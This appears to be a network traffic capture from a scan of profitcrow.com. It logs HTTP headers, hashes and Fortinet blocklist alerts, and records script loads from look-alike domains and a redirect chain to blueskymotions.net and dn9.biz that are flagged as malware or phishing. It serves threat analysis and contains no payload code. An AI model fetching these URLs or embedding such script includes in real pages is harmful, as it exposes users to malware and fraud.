report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CB7eu7RzhfN3zxYdsPKA%2FtgJxvGL0a%2BYgZLi0feJqUXpdXkAnk4%2BwH14eobuM8VwOSQNDAdp0z6kVJ1RFVbJw32MvP04FlmzDcYqv3svE8hsOAn19BheFF6hpM2%2BDjiqRfvX4Bdw"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=15780000
server: cloudflare
cf-ray: 76fdb371adb9b506-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 126828, version 768.256\012- data
Size:   126828
Md5:    297973a488f688271dd223d542ba2697
Sha1:   ed99d812e4c88826335f93acede3fad85c90fb54
Sha256: 1b099f88c06ed0869872561c157f0ec9cbe133a0939d9ece4ee1e1f54bd4683d
                                        
                                            GET /ajax/libs/font-awesome/6.0.0/webfonts/fa-brands-400.woff2 HTTP/1.1 
Host: cdnjs.cloudflare.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://profitcrow.com
Connection: keep-alive
Referer: https://cdnjs.cloudflare.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         104.17.25.14
HTTP/2 200 OK
content-type: application/octet-stream; charset=utf-8
                                        
date: Fri, 25 Nov 2022 22:08:05 GMT
content-length: 104544
access-control-allow-origin: *
cache-control: public, max-age=30672000
etag: "620188b3-19860"
last-modified: Mon, 07 Feb 2022 21:01:39 GMT
cf-cdnjs-via: cfworker/kv
cross-origin-resource-policy: cross-origin
timing-allow-origin: *
x-content-type-options: nosniff
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding
cf-cache-status: HIT
age: 20309511
expires: Wed, 15 Nov 2023 22:08:05 GMT
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vC%2BYAVF0QxF6OGVbTLJxNulZ4qMjcRS6VkBfS1Ip0lsRSLchc%2BTtwTsV46q7NZoQparMWyvHcfACWEbNGkHJhPXIh0AxAfI6rSfpS2ZBsWPFhAh1qI5Ow93WzTwpMVAx4VNgsQgl"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=15780000
server: cloudflare
cf-ray: 76fdb371adbeb506-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 104544, version 768.256\012- data
Size:   104544
Md5:    a9afdb72826cde196ddf29eb8f9d0f8f
Sha1:   69fc982ace0b9fdd2cfa68c6628bcaad00f407fd
Sha256: 29bc44694c394921d1f00271128a2e4cd8293516216e24eac07a73fa821fc1f5
                                        
                                            POST / HTTP/1.1 
Host: zerossl.ocsp.sectigo.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         104.18.32.68
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 25 Nov 2022 22:08:05 GMT
Content-Length: 316
Connection: keep-alive
Last-Modified: Wed, 23 Nov 2022 10:55:04 GMT
Expires: Wed, 30 Nov 2022 10:55:03 GMT
Etag: "dc9f47b7d53de57981087087e2a148c3439b2402"
Cache-Control: max-age=391017,s-maxage=1800,public,no-transform,must-revalidate
X-CCACDN-Proxy-ID: mcdpinlb3
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 76fdb371ffc10b55-OSL

                                        
                                            POST / HTTP/1.1 
Host: ocsp.sca1b.amazontrust.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         143.204.42.156
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Content-Length: 471
Connection: keep-alive
Accept-Ranges: bytes
Cache-Control: max-age=137117
Date: Fri, 25 Nov 2022 22:08:05 GMT
Etag: "6380aa3f-1d7"
Expires: Sun, 27 Nov 2022 12:13:22 GMT
Last-Modified: Fri, 25 Nov 2022 11:42:55 GMT
Server: ECS (dcb/7F82)
X-Cache: Miss from cloudfront
Via: 1.1 057fdebf738f5915bf38a78949190758.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: 4si3StyH6e6n9bTs8SRZnTnRErOWZ8mpFuV2uB6x5mDxVdLhDQ9rvg==
Age: 1827

                                        
                                            GET /track.js?v=9.999 HTTP/1.1 
Host: trick.cofounderspecials.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         91.211.91.112
HTTP/1.1 404 Not Found
Content-Type: text/html
                                        
Server: nginx
Date: Fri, 25 Nov 2022 22:08:05 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Last-Modified: Fri, 29 Jul 2022 15:36:49 GMT
ETag: W/"5b0-5e4f36b22e013"
Content-Encoding: gzip


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text
Size:   729
Md5:    604eea713faef1ae8dafc0224112e662
Sha1:   89f4a04f3088b7fdb308cd0af944a38c6ed99c2b
Sha256: 3905c65876c7b7c1f0a8efae5c758b100d3903c2f94e7177285e898c80eb10f2

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            POST / HTTP/1.1 
Host: zerossl.ocsp.sectigo.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         104.18.32.68
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 25 Nov 2022 22:08:05 GMT
Content-Length: 316
Connection: keep-alive
Last-Modified: Wed, 23 Nov 2022 10:55:04 GMT
Expires: Wed, 30 Nov 2022 10:55:03 GMT
Etag: "dc9f47b7d53de57981087087e2a148c3439b2402"
Cache-Control: max-age=391017,s-maxage=1800,public,no-transform,must-revalidate
X-CCACDN-Proxy-ID: mcdpinlb6
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 76fdb3715db20b06-OSL

                                        
                                            POST / HTTP/1.1 
Host: zerossl.ocsp.sectigo.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         104.18.32.68
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 25 Nov 2022 22:08:05 GMT
Content-Length: 316
Connection: keep-alive
Last-Modified: Wed, 23 Nov 2022 10:55:04 GMT
Expires: Wed, 30 Nov 2022 10:55:03 GMT
Etag: "dc9f47b7d53de57981087087e2a148c3439b2402"
Cache-Control: max-age=391017,s-maxage=1800,public,no-transform,must-revalidate
X-CCACDN-Proxy-ID: mcdpinlb4
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 76fdb3721f80b4ee-OSL

                                        
                                            GET /wp-content/uploads/2021/12/Hue_Saturation-1.png HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/wp-content/uploads/elementor/css/post-6.css
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: image/png
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:05 GMT
last-modified: Fri, 24 Dec 2021 05:34:49 GMT
accept-ranges: bytes
content-length: 274736
date: Fri, 25 Nov 2022 22:08:05 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 1920 x 825, 8-bit/color RGBA, non-interlaced\012- data
Size:   274736
Md5:    8148085f8be86c27e55ac1ebfcede4f3
Sha1:   8614958426bd898d140fccded6f498621e0c2a67
Sha256: c46f0a60b61fa9a29497ba2780a5d8d6a0156bd8854dc9750c1d02dc758f62aa
                                        
                                            GET /go.php?id=9677-22-5680954-11 HTTP/1.1 
Host: away.cdnbestplatform.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

                                         91.211.91.104
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
server: nginx
date: Fri, 25 Nov 2022 22:08:06 GMT
content-length: 414
vary: Accept-Encoding
content-encoding: gzip
strict-transport-security: max-age=15768000;
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document text\012- exported SGML document, ASCII text, with CRLF line terminators
Size:   414
Md5:    2195bef4e17d775027cbb80db63e6f18
Sha1:   1a4ccabbd3b9d4048a70c2bbba0e9911b6081a16
Sha256: 4773d2081026ee36a5f87fc0a2b9c257d1b44b23d67b8187fcb9c031eeadcfe5

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/elementor/assets/lib/font-awesome/webfonts/fa-solid-900.ttf HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447; trainmeassyst=1
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: font/ttf
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:06 GMT
last-modified: Thu, 23 Dec 2021 05:08:51 GMT
accept-ranges: bytes
content-length: 202744
date: Fri, 25 Nov 2022 22:08:06 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  TrueType Font data, 13 tables, 1st "FFTM", 28 names, Macintosh\012- data
Size:   202744
Md5:    605ed7926cf39a2ad5ec2d1f9d391d3d
Sha1:   c1b9fae262f42868c075ac865a8ab34920e20a2c
Sha256: 3d06af1f31cd83ace7a265a014b8fb5dee15770ecac8f7a55555190e627e03c2

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         23.36.76.249
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "366FADC9DDD844F08D7221F39A82B1D11F30F4E60C16B0A6C413F9CE59B2D327"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=21600
Expires: Sat, 26 Nov 2022 04:08:07 GMT
Date: Fri, 25 Nov 2022 22:08:07 GMT
Connection: keep-alive

                                        
                                            GET /?p=meygky3cmm5gi3bpg42tmmy&sub2=dfastspeed17 HTTP/1.1 
Host: blueskymotions.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://away.cdnbestplatform.com/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

                                         185.177.94.108
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
server: nginx
date: Fri, 25 Nov 2022 22:08:07 GMT
access-control-allow-origin: *
set-cookie: uuid=ede59595-4aac-48f8-ba4c-16b1da54c3a0; expires=Sun, 25-Dec-2022 22:08:07 GMT; Max-Age=2592000; path=/; domain=blueskymotions.net
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document, Unicode text, UTF-8 text, with very long lines (29334)
Size:   53094
Md5:    4f71824f663aeaca1fe5c429583d7ed1
Sha1:   752c61875bc0159c6f250d121037208e15c40d3b
Sha256: f898c854c4dbc1d57ab9b9e0f7c37ac5c0d49e61dd64e9d384f9a9d929bcfe60
                                        
                                            GET /2.0/v/0.42.63/runboard/runboard.css HTTP/1.1 
Host: freeserv-static.dukascopy.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://freeserv.dukascopy.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-site
TE: trailers

                                         104.22.7.183
HTTP/2 200 OK
content-type: text/css
                                        
date: Fri, 25 Nov 2022 22:08:05 GMT
last-modified: Tue, 03 May 2022 08:54:50 GMT
vary: Accept-Encoding
etag: W/"6270edda-7e72"
expires: Tue, 29 Nov 2022 16:08:47 GMT
cache-control: max-age=604800
content-encoding: gzip
strict-transport-security: max-age=63072000; includeSubDomains
cf-cache-status: HIT
age: 280758
server: cloudflare
cf-ray: 76fdb373afa7fac8-OSL
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (32370), with no line terminators
Size:   8120
Md5:    097f20cd8af38062abcfd6d605b4806b
Sha1:   8205885c03337b589441595cf670963cc4183650
Sha256: a7d3c5bcaffd1bbb13cf27fbb8c53e6d037da63edbae23114dcd5706e71717b0
                                        
                                            GET /wp-content/uploads/2022/03/rm373batch4-07-11.png HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/wp-content/uploads/elementor/css/post-6.css
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: image/png
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:05 GMT
last-modified: Tue, 29 Mar 2022 07:14:13 GMT
accept-ranges: bytes
content-length: 98678
date: Fri, 25 Nov 2022 22:08:05 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 1920 x 1477, 8-bit colormap, non-interlaced\012- data
Size:   33271
Md5:    e1a901c26fadecf3957e9727cb284195
Sha1:   eeb0dd0b74e04b8fa4d2b99e3816a2739d2ab94b
Sha256: 8c4dbb37efe743ca182a1499329cd0e3926138f5079a07951653d128e489273c
                                        
                                            GET /visualization/financial/charts/v1/HistoricalPrices?app-key=F533042BF81842ADBF5DA2F24C79C4A6&symbol=AAPL&dividends=true&splits=true&palette=Financial-Light HTTP/1.1 
Host: api.stockdio.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

                                         34.232.23.18
HTTP/2 200 OK
content-type: text/html; charset=utf-8
                                        
date: Fri, 25 Nov 2022 22:08:05 GMT
content-length: 67777
set-cookie: AWSALB=dxTWw/NWL51e/q8woKZP85fllJLD9v5q4rFrNQuIvz7caEE5Jo5lYvK/LpOKv1G/G5SF4r5jYzxBuopbCtN4HqmmvDB31L6fI+dA5PEW8BJoJmJ0a753IGMXOJRP; Expires=Fri, 02 Dec 2022 22:08:05 GMT; Path=/ AWSALBCORS=dxTWw/NWL51e/q8woKZP85fllJLD9v5q4rFrNQuIvz7caEE5Jo5lYvK/LpOKv1G/G5SF4r5jYzxBuopbCtN4HqmmvDB31L6fI+dA5PEW8BJoJmJ0a753IGMXOJRP; Expires=Fri, 02 Dec 2022 22:08:05 GMT; Path=/; SameSite=None; Secure
cache-control: private
server: Microsoft-IIS/10.0
x-aspnet-version: 4.0.30319
x-powered-by: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (697), with CRLF line terminators
Size:   39283
Md5:    9ba5d142e000263fa4aaf9e9c37a4854
Sha1:   2ff4634251b004860087bcb69d48a547b20d41d5
Sha256: 9925b12681abed6d2e1ae8543c705e2f2cf70ff7a69f79ab34149d9d98be1cae
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: 0.blueskymotions.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://0.blueskymotions.net/?p=meygky3cmm5gi3bpg42tmmy&sub2=dfastspeed17
Cookie: uuid=ede59595-4aac-48f8-ba4c-16b1da54c3a0; uuid=ede59595-4aac-48f8-ba4c-16b1da54c3a0
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         185.177.94.108
HTTP/2 204 No Content
                                        
server: nginx
date: Fri, 25 Nov 2022 22:08:07 GMT
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
X-Firefox-Spdy: h2

                                        
                                            GET /sw/w1s.js HTTP/1.1 
Host: dn9.biz
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://0.blueskymotions.net/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
TE: trailers

                                         195.154.50.108
HTTP/2 200 OK
content-type: application/javascript; charset=UTF-8
                                        
server: nginx
date: Fri, 25 Nov 2022 22:08:08 GMT
access-control-allow-origin: *
expires: Sat, 25 Nov 2023 22:08:08 GMT
cache-control: max-age=31536000
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   1378
Md5:    34c00cf5443febeae48dc3c896896d69
Sha1:   ce1d1d13e299e89fe868e917f48a92b82a1363b3
Sha256: 793861760be013eec01e380fcc6b939e702437cfa71e43a67cba51c243dfc903
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         23.36.76.249
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "1613886E84406DCC6B175B2273D8BB1A58B035D16ED71FE53A65386B21247F03"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=10700
Expires: Sat, 26 Nov 2022 01:06:29 GMT
Date: Fri, 25 Nov 2022 22:08:09 GMT
Connection: keep-alive

                                        
                                            GET /2.0/?path=realtime_sentiment_index/index&liquidity=consumers&type=swfx&showPairs=true&showCurrencies=true&availableInstruments=l%3AEUR/USD%2CGBP/USD%2CUSD/CHF%2CUSD/JPY%2CAUD/USD%2CXAU/USD%2CE_SandP-500%2CE_Brent&availableCurrencies=AUD%2CCAD%2CCHF%2CGBP%2CJPY%2CNZD%2CUSD%2CEUR&headingColor=%23000000&dateColor=%23000000&bgColor=%23ffffff&width=940&height=535&adv=popup HTTP/1.1 
Host: freeserv.dukascopy.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

                                         194.8.15.120
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
server: nginx
date: Fri, 25 Nov 2022 22:08:05 GMT
content-encoding: gzip
vary: Accept-Encoding
strict-transport-security: max-age=63072000; includeSubDomains
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /?auf=mzstkzrrgq5diojygyxtonjwgmxtemrpge3dmojuge2daobx&s=1&sub1=&sub2=dfastspeed17&sub3=&sub4=&cpc=0&cpm=0 HTTP/1.1 
Host: 0.blueskymotions.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://0.blueskymotions.net/?p=meygky3cmm5gi3bpg42tmmy&sub2=dfastspeed17
Cookie: uuid=ede59595-4aac-48f8-ba4c-16b1da54c3a0; uuid=ede59595-4aac-48f8-ba4c-16b1da54c3a0
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
TE: trailers

                                         185.177.94.108
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
server: nginx
date: Fri, 25 Nov 2022 22:08:08 GMT
access-control-allow-origin: *
set-cookie: uuid=ede59595-4aac-48f8-ba4c-16b1da54c3a0; expires=Sun, 25-Dec-2022 22:08:08 GMT; Max-Age=2592000; path=/
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /2.0/v/0.42.63/rsindex/rsindex.css HTTP/1.1 
Host: freeserv-static.dukascopy.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://freeserv.dukascopy.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-site
TE: trailers

                                         104.22.7.183
HTTP/2 200 OK
content-type: text/css
                                        
date: Fri, 25 Nov 2022 22:08:05 GMT
last-modified: Tue, 03 May 2022 08:54:50 GMT
vary: Accept-Encoding
etag: W/"6270edda-4718"
expires: Fri, 02 Dec 2022 13:56:25 GMT
cache-control: max-age=604800
content-encoding: gzip
strict-transport-security: max-age=63072000; includeSubDomains
cf-cache-status: HIT
age: 29500
server: cloudflare
cf-ray: 76fdb373bfb7fac8-OSL
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /sort.js?v=100 HTTP/1.1 
Host: scripts.bettershitecolumn.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         91.211.91.104
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
server: nginx
date: Fri, 25 Nov 2022 22:08:05 GMT
last-modified: Wed, 31 Aug 2022 20:23:49 GMT
vary: Accept-Encoding
etag: W/"630fc355-92c"
expires: Thu, 31 Dec 2037 23:55:55 GMT
cache-control: max-age=315360000
strict-transport-security: max-age=15768000;
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /stick.js?v=7.77.7 HTTP/1.1 
Host: new.weatherplllatform.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         91.211.91.114
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
server: nginx
date: Fri, 25 Nov 2022 22:08:05 GMT
last-modified: Sun, 06 Nov 2022 00:27:12 GMT
vary: Accept-Encoding
etag: W/"6366ff60-a40"
expires: Thu, 31 Dec 2037 23:55:55 GMT
cache-control: max-age=315360000
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /strong.js?v=4.40 HTTP/1.1 
Host: simple.cofounderspecials.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         91.211.91.114
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
server: nginx
date: Fri, 25 Nov 2022 22:08:05 GMT
last-modified: Mon, 26 Sep 2022 14:52:14 GMT
vary: Accept-Encoding
etag: W/"6331bc9e-920"
expires: Thu, 31 Dec 2037 23:55:55 GMT
cache-control: max-age=315360000
strict-transport-security: max-age=15768000;
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /wp-content/uploads/2022/03/stock-market-graph-financial-data-electronic-board-laptop-screen1.png HTTP/1.1 
Host: profitcrow.com
                                        
